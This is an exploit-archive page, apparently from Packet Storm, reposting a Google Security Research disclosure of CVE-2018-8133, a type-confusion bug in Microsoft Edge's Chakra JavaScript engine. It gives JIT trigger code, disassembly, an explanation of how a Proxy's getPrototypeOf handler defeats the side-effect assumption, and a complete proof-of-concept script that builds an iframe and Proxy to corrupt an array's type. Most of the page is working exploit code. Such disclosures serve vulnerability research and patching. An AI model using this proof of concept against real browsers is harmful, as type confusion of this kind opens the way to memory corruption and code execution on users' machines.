exploit the possibilities

Microsoft Edge Chakra EntrySimpleObjectSlotGetter Type Confusion

Microsoft Edge Chakra EntrySimpleObjectSlotGetter Type Confusion
Posted May 31, 2018
Authored by Google Security Research, lokihardt

Microsoft Edge Chakra suffers from an issue where EntrySimpleObjectSlotGetter can have side effects that cause a type confusion vulnerability.

tags | exploit
advisories | CVE-2018-8133
MD5 | ae691da69a6f584e9d6f3d6f325cc89e

Microsoft Edge Chakra EntrySimpleObjectSlotGetter Type Confusion

Change Mirror Download
Microsoft Edge: Chakra: EntrySimpleObjectSlotGetter can have side effects 

CVE-2018-8133


function opt(w, arr) {
arr[0] = 1.1;
let res = w.event;
arr[0] = 2.3023e-320;
return res;
}

let arr = [1.1];
for (let i = 0; i < 10000; i++) {
opt(window, arr);
}

The above code will be compiled as follows:
000001a8`8000122b 48b8503dcfd5ff7f0000 mov rax,offset chakra!DOMFastPath<7>::EntrySimpleObjectSlotGetter (00007fff`d5cf3d50) // w.event
000001a8`80001235 48ffd0 call rax
000001a8`80001238 488b8e30bdf0ff mov rcx,qword ptr [rsi-0F42D0h]
000001a8`8000123f f2480f104158 movsd xmm0,mmword ptr [rcx+58h]
000001a8`80001245 f2490f11442418 movsd mmword ptr [r12+18h],xmm0 // arr[0] = 2.3023e-320;
...

As you can see, there's no "ImplicitCallFlags" check after the call to the "EntrySimpleObjectSlotGetter" method. The code was generated based on the assumption that the method has no side effects. But in fact, the method can have side effects. The method wraps the return value using the "CrossSite::MarshalVar" method which traverses up the prototype chain of the given object using the "GetPrototype" method, since the "GetPrototype" method may invoke the "getPrototypeOf" handler of a Proxy object, changing the type of the array in the handler will lead to type confusion.

PoC:
function opt(w, arr) {
arr[0] = 1.1;
let res = w.event;
arr[0] = 2.3023e-320;
return res;
}

function main() {
let f = document.body.appendChild(document.createElement('iframe'));
f.contentWindow;

for (let i = 0; i < 100000; i++) {
opt(window, [1.1]);
}

let set_callback = new f.contentWindow.Function('callback', `
window.__lookupSetter__('event').call(parent, new Proxy({}, {
getPrototypeOf() {
callback();
return {};
}
}));`);

let arr = [1.1];
set_callback(() => {
arr[0] = {};
});

opt(window, arr);
alert(arr);
}

main();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    2 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close